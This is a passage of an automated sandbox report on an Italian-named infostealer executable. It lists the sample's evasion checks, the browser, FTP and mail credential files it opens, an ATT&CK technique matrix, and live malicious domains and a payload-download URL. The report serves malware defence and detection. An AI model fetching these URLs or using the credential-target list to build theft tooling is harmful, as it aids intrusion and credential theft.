            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI coverage: 2.1 %
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5224Thread sleep count: 1471 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 5224Thread sleep count: 8385 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598249s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597264s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596814s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595155s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -595046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -594717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exe TID: 2528Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00402930 FindFirstFileW,4_2_00402930
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_004069FF FindFirstFileW,FindClose,4_2_004069FF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405DAE
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597264Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596814Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595155Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594717Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594609Jump to behavior
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3370388487.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, Documenti di spedizione.bat.exe, 00000004.00000002.3370388487.0000000002F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Documenti di spedizione.bat.exe, 00000004.00000002.3370388487.0000000002FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4368
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4597
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_73D827A4 LdrInitializeThunk,VirtualAlloc,0_2_73D827A4
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_73D81BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73D81BFF
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess created: C:\Users\user\Desktop\Documenti di spedizione.bat.exe "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Users\user\Desktop\Documenti di spedizione.bat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 0_2_00403665 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403665
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 5684, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 5684, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3389706331.0000000033311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Documenti di spedizione.bat.exe PID: 5684, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            13
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            226
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets151
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Documenti di spedizione.bat.exe8%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://109.248.150.252/WrqjRdXcfPugZeXkIIJdo57.bin0%Avira URL Cloudsafe
            http://concaribe.com100%Avira URL Cloudmalware
            http://ftp.concaribe.com100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.13.205
            truefalse
              high
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://109.248.150.252/WrqjRdXcfPugZeXkIIJdo57.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgDocumenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ftp.concaribe.comDocumenti di spedizione.bat.exe, 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://nsis.sf.net/NSIS_ErrorErrorDocumenti di spedizione.bat.exefalse
                        high
                        http://concaribe.comDocumenti di spedizione.bat.exe, 00000004.00000002.3389706331.000000003333C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://api.ipify.org/tDocumenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDocumenti di spedizione.bat.exe, 00000004.00000002.3389706331.00000000332C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            104.26.13.205
                            api.ipify.orgUnited States
                            13335CLOUDFLARENETUSfalse
                            192.185.13.234
                            concaribe.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue
                            109.248.150.252
                            unknownRussian Federation
                            52048DATACLUBLVfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1568249
                            Start date and time:2024-12-04 13:38:11 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Documenti di spedizione.bat.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/7@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 91
                            • Number of non-executed functions: 74
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryDirectoryFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: Documenti di spedizione.bat.exe
                            TimeTypeDescription
                            07:40:18API Interceptor506x Sleep call for process: Documenti di spedizione.bat.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                            • api.ipify.org/
                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                            • api.ipify.org/
                            192.185.13.234draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            api.ipify.orgOrder NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.26.12.205
                            Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                            • 172.67.74.152
                            Employee_Important_Message.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.12.205
                            v58HgfB8Af.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.13.205
                            zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 104.26.12.205
                            e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.26.12.205
